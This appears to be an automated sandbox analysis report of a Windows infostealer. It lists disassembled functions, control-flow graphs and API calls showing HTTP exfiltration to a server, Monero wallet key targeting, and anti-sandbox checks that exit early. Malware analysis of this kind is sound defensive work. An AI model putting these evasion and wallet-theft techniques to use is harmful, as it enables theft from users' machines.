                                    • GetProcAddress.KERNEL32(6F280000,00F26960), ref: 0037A840
                                    • GetProcAddress.KERNEL32(6F280000,00F26980), ref: 0037A858
                                    • GetProcAddress.KERNEL32(6F280000,00F26A00), ref: 0037A870
                                    • GetProcAddress.KERNEL32(6F280000,00F3CD00), ref: 0037A889
                                    • GetProcAddress.KERNEL32(6F280000,00F268A0), ref: 0037A8A1
                                    • GetProcAddress.KERNEL32(6F280000,00F266C0), ref: 0037A8B9
                                    • GetProcAddress.KERNEL32(6F280000,00F26700), ref: 0037A8D2
                                    • GetProcAddress.KERNEL32(6F280000,00F26800), ref: 0037A8EA
                                    • GetProcAddress.KERNEL32(6F280000,InternetSetOptionA), ref: 0037A901
                                    • GetProcAddress.KERNEL32(6F280000,HttpQueryInfoA), ref: 0037A917
                                    • GetProcAddress.KERNEL32(74E00000,00F3CB50), ref: 0037A939
                                    • GetProcAddress.KERNEL32(74E00000,00F38B10), ref: 0037A951
                                    • GetProcAddress.KERNEL32(74E00000,00F3CC28), ref: 0037A969
                                    • GetProcAddress.KERNEL32(74E00000,00F3CB98), ref: 0037A982
                                    • GetProcAddress.KERNEL32(74DF0000,00F268C0), ref: 0037A9A3
                                    • GetProcAddress.KERNEL32(6E080000,00F3CBC8), ref: 0037A9C4
                                    • GetProcAddress.KERNEL32(6E080000,00F26720), ref: 0037A9DD
                                    • GetProcAddress.KERNEL32(6E080000,00F3CBE0), ref: 0037A9F5
                                    • GetProcAddress.KERNEL32(6E080000,00F3CD90), ref: 0037AA0D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: fcd9323c52536ece990fcbe7c87a950764678745e03ce290901cf391b79bedcb
                                    • Instruction ID: 93617159f92baad12fcdbdc5546c86acd0ddeef067cb5f85316417244055db2f
                                    • Opcode Fuzzy Hash: fcd9323c52536ece990fcbe7c87a950764678745e03ce290901cf391b79bedcb
                                    • Instruction Fuzzy Hash: 50620DF6518204AFC364DFA8ED8895677FBE74D701318B61AB909C3A70D735AA40DBE0
                                    Function 003648D0 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 801 3648d0-364992 call 37aab0 call 364800 call 37aa50 * 5 InternetOpenA StrCmpCA 816 364994 801->816 817 36499b-36499f 801->817 816->817 818 3649a5-364b1d call 378cf0 call 37ac30 call 37abb0 call 37ab10 * 2 call 37acc0 call 37abb0 call 37ab10 call 37acc0 call 37abb0 call 37ab10 call 37ac30 call 37abb0 call 37ab10 call 37acc0 call 37abb0 call 37ab10 call 37acc0 call 37abb0 call 37ab10 call 37acc0 call 37ac30 call 37abb0 call 37ab10 * 2 InternetConnectA 817->818 819 364f1b-364f43 InternetCloseHandle call 37ade0 call 36a210 817->819 818->819 905 364b23-364b27 818->905 828 364f45-364f7d call 37ab30 call 37acc0 call 37abb0 call 37ab10 819->828 829 364f82-364ff2 call 378b20 * 2 call 37aab0 call 37ab10 * 8 819->829 828->829 906 364b35 905->906 907 364b29-364b33 905->907 908 364b3f-364b72 HttpOpenRequestA 906->908 907->908 909 364f0e-364f15 InternetCloseHandle 908->909 910 364b78-364e78 call 37acc0 call 37abb0 call 37ab10 call 37ac30 call 37abb0 call 37ab10 call 37acc0 call 37abb0 call 37ab10 call 37acc0 call 37abb0 call 37ab10 call 37acc0 call 37abb0 call 37ab10 call 37acc0 call 37abb0 call 37ab10 call 37ac30 call 37abb0 call 37ab10 call 37acc0 call 37abb0 call 37ab10 call 37acc0 call 37abb0 call 37ab10 call 37ac30 call 37abb0 call 37ab10 call 37acc0 call 37abb0 call 37ab10 call 37acc0 call 37abb0 call 37ab10 call 37acc0 call 37abb0 call 37ab10 call 37acc0 call 37abb0 call 37ab10 call 37ac30 call 37abb0 call 37ab10 call 37aa50 call 37ac30 * 2 call 37abb0 call 37ab10 * 2 call 37ade0 lstrlen call 37ade0 * 2 lstrlen call 37ade0 HttpSendRequestA 908->910 909->819 1021 364e82-364eac InternetReadFile 910->1021 1022 364eb7-364f09 InternetCloseHandle call 37ab10 1021->1022 1023 364eae-364eb5 1021->1023 1022->909 1023->1022 1024 364eb9-364ef7 call 37acc0 call 37abb0 call 37ab10 1023->1024 1024->1021
                                    APIs
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 00364800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00364889
                                      • Part of subcall function 00364800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00364899
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00364965
                                    • StrCmpCA.SHLWAPI(?,00F3E4F0), ref: 0036498A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00364B0A
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00380DDE,00000000,?,?,00000000,?,",00000000,?,00F3E4A0), ref: 00364E38
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00364E54
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00364E68
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00364E99
                                    • InternetCloseHandle.WININET(00000000), ref: 00364EFD
                                    • InternetCloseHandle.WININET(00000000), ref: 00364F15
                                    • HttpOpenRequestA.WININET(00000000,00F3E500,?,00F3DBF0,00000000,00000000,00400100,00000000), ref: 00364B65
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 0037AC30: lstrcpy.KERNEL32(00000000,?), ref: 0037AC82
                                      • Part of subcall function 0037AC30: lstrcat.KERNEL32(00000000), ref: 0037AC92
                                    • InternetCloseHandle.WININET(00000000), ref: 00364F1F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: e9dd927ba5d8241795f7d7c448003f58d2ab1af21ea631acb10f15d4920f02b9
                                    • Instruction ID: d7ff792c163fd6151f141fbe7fec76c521167e5fb8a7ac334c62bb4eca51f954
                                    • Opcode Fuzzy Hash: e9dd927ba5d8241795f7d7c448003f58d2ab1af21ea631acb10f15d4920f02b9
                                    • Instruction Fuzzy Hash: 75120172910518ABDB26EB90DDA2FEEB379AF54700F1081D9F10A6A091DF746F48CF61
                                    Function 00375760 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1090 375760-3757c7 call 375d20 call 37ab30 * 3 call 37aa50 * 4 1106 3757cc-3757d3 1090->1106 1107 375827-37589c call 37aa50 * 2 call 361590 call 375510 call 37abb0 call 37ab10 call 37ade0 StrCmpCA 1106->1107 1108 3757d5-375806 call 37ab30 call 37aab0 call 361590 call 375440 1106->1108 1134 3758e3-3758f9 call 37ade0 StrCmpCA 1107->1134 1138 37589e-3758de call 37aab0 call 361590 call 375440 call 37abb0 call 37ab10 1107->1138 1123 37580b-375822 call 37abb0 call 37ab10 1108->1123 1123->1134 1139 3758ff-375906 1134->1139 1140 375a2c-375a94 call 37abb0 call 37ab30 * 2 call 3616b0 call 37ab10 * 4 call 361670 call 361550 1134->1140 1138->1134 1142 37590c-375913 1139->1142 1143 375a2a-375aaf call 37ade0 StrCmpCA 1139->1143 1269 375d13-375d16 1140->1269 1146 375915-375969 call 37ab30 call 37aab0 call 361590 call 375440 call 37abb0 call 37ab10 1142->1146 1147 37596e-3759e3 call 37aa50 * 2 call 361590 call 375510 call 37abb0 call 37ab10 call 37ade0 StrCmpCA 1142->1147 1162 375ab5-375abc 1143->1162 1163 375be1-375c49 call 37abb0 call 37ab30 * 2 call 3616b0 call 37ab10 * 4 call 361670 call 361550 1143->1163 1146->1143 1147->1143 1246 3759e5-375a25 call 37aab0 call 361590 call 375440 call 37abb0 call 37ab10 1147->1246 1168 375ac2-375ac9 1162->1168 1169 375bdf-375c64 call 37ade0 StrCmpCA 1162->1169 1163->1269 1175 375b23-375b98 call 37aa50 * 2 call 361590 call 375510 call 37abb0 call 37ab10 call 37ade0 StrCmpCA 1168->1175 1176 375acb-375b1e call 37ab30 call 37aab0 call 361590 call 375440 call 37abb0 call 37ab10 1168->1176 1198 375c66-375c71 Sleep 1169->1198 1199 375c78-375ce1 call 37abb0 call 37ab30 * 2 call 3616b0 call 37ab10 * 4 call 361670 call 361550 1169->1199 1175->1169 1274 375b9a-375bda call 37aab0 call 361590 call 375440 call 37abb0 call 37ab10 1175->1274 1176->1169 1198->1106 1199->1269 1246->1143 1274->1169
                                    APIs
                                      • Part of subcall function 0037AB30: lstrlen.KERNEL32(00364F55,?,?,00364F55,00380DDF), ref: 0037AB3B
                                      • Part of subcall function 0037AB30: lstrcpy.KERNEL32(00380DDF,00000000), ref: 0037AB95
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00375894
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003758F1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00375AA7
                                      • Part of subcall function 0037AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0037AAF6
                                      • Part of subcall function 00375440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00375478
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                      • Part of subcall function 00375510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00375568
                                      • Part of subcall function 00375510: lstrlen.KERNEL32(00000000), ref: 0037557F
                                      • Part of subcall function 00375510: StrStrA.SHLWAPI(00000000,00000000), ref: 003755B4
                                      • Part of subcall function 00375510: lstrlen.KERNEL32(00000000), ref: 003755D3
                                      • Part of subcall function 00375510: lstrlen.KERNEL32(00000000), ref: 003755FE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003759DB
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00375B90
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00375C5C
                                    • Sleep.KERNEL32(0000EA60), ref: 00375C6B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: eca4ad822c934efb8f78f2fec99bcb2a913d05a431cb889871f086c5bc7ec9bb
                                    • Instruction ID: 0f14accd0f0d6dc72194ad3f01b794a5918a7db5c7919562062e56474cc352ee
                                    • Opcode Fuzzy Hash: eca4ad822c934efb8f78f2fec99bcb2a913d05a431cb889871f086c5bc7ec9bb
                                    • Instruction Fuzzy Hash: 75E135719105049BCB2AFBA0DD66DED737EAF94300F50C568F50B6A095EF786B08CB92
                                    Function 003719F0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1301 3719f0-371a1d call 37ade0 StrCmpCA 1304 371a27-371a41 call 37ade0 1301->1304 1305 371a1f-371a21 ExitProcess 1301->1305 1309 371a44-371a48 1304->1309 1310 371c12-371c1d call 37ab10 1309->1310 1311 371a4e-371a61 1309->1311 1312 371a67-371a6a 1311->1312 1313 371bee-371c0d 1311->1313 1316 371a71-371a80 call 37ab30 1312->1316 1317 371b1f-371b30 StrCmpCA 1312->1317 1318 371bdf-371be9 call 37ab30 1312->1318 1319 371afd-371b0e StrCmpCA 1312->1319 1320 371a99-371aa8 call 37ab30 1312->1320 1321 371a85-371a94 call 37ab30 1312->1321 1322 371b63-371b74 StrCmpCA 1312->1322 1323 371b82-371b93 StrCmpCA 1312->1323 1324 371b41-371b52 StrCmpCA 1312->1324 1325 371ba1-371bb2 StrCmpCA 1312->1325 1326 371bc0-371bd1 StrCmpCA 1312->1326 1327 371acf-371ae0 StrCmpCA 1312->1327 1328 371aad-371abe StrCmpCA 1312->1328 1313->1309 1316->1313 1346 371b32-371b35 1317->1346 1347 371b3c 1317->1347 1318->1313 1344 371b10-371b13 1319->1344 1345 371b1a 1319->1345 1320->1313 1321->1313 1350 371b76-371b79 1322->1350 1351 371b80 1322->1351 1329 371b95-371b98 1323->1329 1330 371b9f 1323->1330 1348 371b54-371b57 1324->1348 1349 371b5e 1324->1349 1331 371bb4-371bb7 1325->1331 1332 371bbe 1325->1332 1334 371bd3-371bd6 1326->1334 1335 371bdd 1326->1335 1342 371ae2-371aec 1327->1342 1343 371aee-371af1 1327->1343 1340 371ac0-371ac3 1328->1340 1341 371aca 1328->1341 1329->1330 1330->1313 1331->1332 1332->1313 1334->1335 1335->1313 1340->1341 1341->1313 1355 371af8 1342->1355 1343->1355 1344->1345 1345->1313 1346->1347 1347->1313 1348->1349 1349->1313 1350->1351 1351->1313 1355->1313
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 00371A15
                                    • ExitProcess.KERNEL32 ref: 00371A21
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 8ffd9cdc2612be073d556bbe5f7de699b07e0c34acb32a555cdbb1943632625f
                                    • Instruction ID: 3e3ec125c801f8ff394de0a562394bfb3789ca7187aa89782c6915d3eb78fae9
                                    • Opcode Fuzzy Hash: 8ffd9cdc2612be073d556bbe5f7de699b07e0c34acb32a555cdbb1943632625f
                                    • Instruction Fuzzy Hash: B85132B5B04209EFCB79DFD8D954AAE77B9EF44704F108088F40AAB250E778E949CB51
                                    Function 00376C90 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F306F0), ref: 00379BF1
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F30648), ref: 00379C0A
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F30840), ref: 00379C22
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F30570), ref: 00379C3A
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F30588), ref: 00379C53
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F38AA0), ref: 00379C6B
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F264E0), ref: 00379C83
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F26280), ref: 00379C9C
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F305A0), ref: 00379CB4
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F30690), ref: 00379CCC
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F305B8), ref: 00379CE5
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F305D0), ref: 00379CFD
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F26660), ref: 00379D15
                                      • Part of subcall function 00379BB0: GetProcAddress.KERNEL32(75900000,00F30708), ref: 00379D2E
                                      • Part of subcall function 0037AA50: lstrcpy.KERNEL32(00380E1A,00000000), ref: 0037AA98
                                      • Part of subcall function 003611D0: ExitProcess.KERNEL32 ref: 00361211
                                      • Part of subcall function 00361160: GetSystemInfo.KERNEL32(?), ref: 0036116A
                                      • Part of subcall function 00361160: ExitProcess.KERNEL32 ref: 0036117E
                                      • Part of subcall function 00361110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0036112B
                                      • Part of subcall function 00361110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00361132
                                      • Part of subcall function 00361110: ExitProcess.KERNEL32 ref: 00361143
                                      • Part of subcall function 00361220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0036123E
                                      • Part of subcall function 00361220: ExitProcess.KERNEL32 ref: 00361294
                                      • Part of subcall function 00376A10: GetUserDefaultLangID.KERNEL32 ref: 00376A14
                                      • Part of subcall function 00361190: ExitProcess.KERNEL32 ref: 003611C6
                                      • Part of subcall function 003779E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003611B7), ref: 00377A10
                                      • Part of subcall function 003779E0: RtlAllocateHeap.NTDLL(00000000), ref: 00377A17
                                      • Part of subcall function 003779E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00377A2F
                                      • Part of subcall function 00377A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377AA0
                                      • Part of subcall function 00377A70: RtlAllocateHeap.NTDLL(00000000), ref: 00377AA7
                                      • Part of subcall function 00377A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00377ABF
                                      • Part of subcall function 0037ACC0: lstrlen.KERNEL32(?,00F38980,?,\Monero\wallet.keys,00380E1A), ref: 0037ACD5
                                      • Part of subcall function 0037ACC0: lstrcpy.KERNEL32(00000000), ref: 0037AD14
                                      • Part of subcall function 0037ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AD22
                                      • Part of subcall function 0037ABB0: lstrcpy.KERNEL32(?,00380E1A), ref: 0037AC15
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F38AB0,?,003810F4,?,00000000,?,003810F8,?,00000000,00380AF3), ref: 00376D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00376D88
                                    • CloseHandle.KERNEL32(00000000), ref: 00376D99
                                    • Sleep.KERNEL32(00001770), ref: 00376DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,00F38AB0,?,003810F4,?,00000000,?,003810F8,?,00000000,00380AF3), ref: 00376DBA
                                    • ExitProcess.KERNEL32 ref: 00376DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                    • Associated: 00000000.00000002.2106906466.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000038C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.00000000004CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2106925343.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000007CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107128844.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107374782.00000000008E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2107486990.0000000000A7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_360000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2931873225-0
                                    • Opcode ID: 5751956bcdee18b08d4e4b370cca95d0f1853b2faf53ed84cb4fb97ff625e250
                                    • Instruction ID: bb59ada8f92da6f5c4bcd89730989eac0215ffdab8ab7e59a57c64ef97b0ce50
                                    • Opcode Fuzzy Hash: 5751956bcdee18b08d4e4b370cca95d0f1853b2faf53ed84cb4fb97ff625e250
                                    • Instruction Fuzzy Hash: 21315071A04608ABDB27F7F0DC67BEE7379AF40700F148918F116AA191DF785905C7A2
                                    Function 00376D93 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1436 376d93 1437 376daa 1436->1437 1439 376dac-376dc2 call 376bc0 call 375d60 CloseHandle ExitProcess 1437->1439 1440 376d5a-376d77 call 37ade0 OpenEventA 1437->1440 1445 376d95-376da4 CloseHandle Sleep 1440->1445 1446 376d79-376d91 call 37ade0 CreateEventA 1440->1446 1445->1437 1446->1439
                                    APIs
                                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00F38AB0,?,003810F4,?,00000000,?,003810F8,?,00000000,00380AF3), ref: 00376D6A
                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00376D88
                                    • CloseHandle.KERNEL32(00000000), ref: 00376D99
                                    • Sleep.KERNEL32(00001770), ref: 00376DA4
                                    • CloseHandle.KERNEL32(?,00000000,?,00F38AB0,?,003810F4,?,00000000,?,003810F8,?,00000000,00380AF3), ref: 00376DBA
                                    • ExitProcess.KERNEL32 ref: 00376DC2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2106925343.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
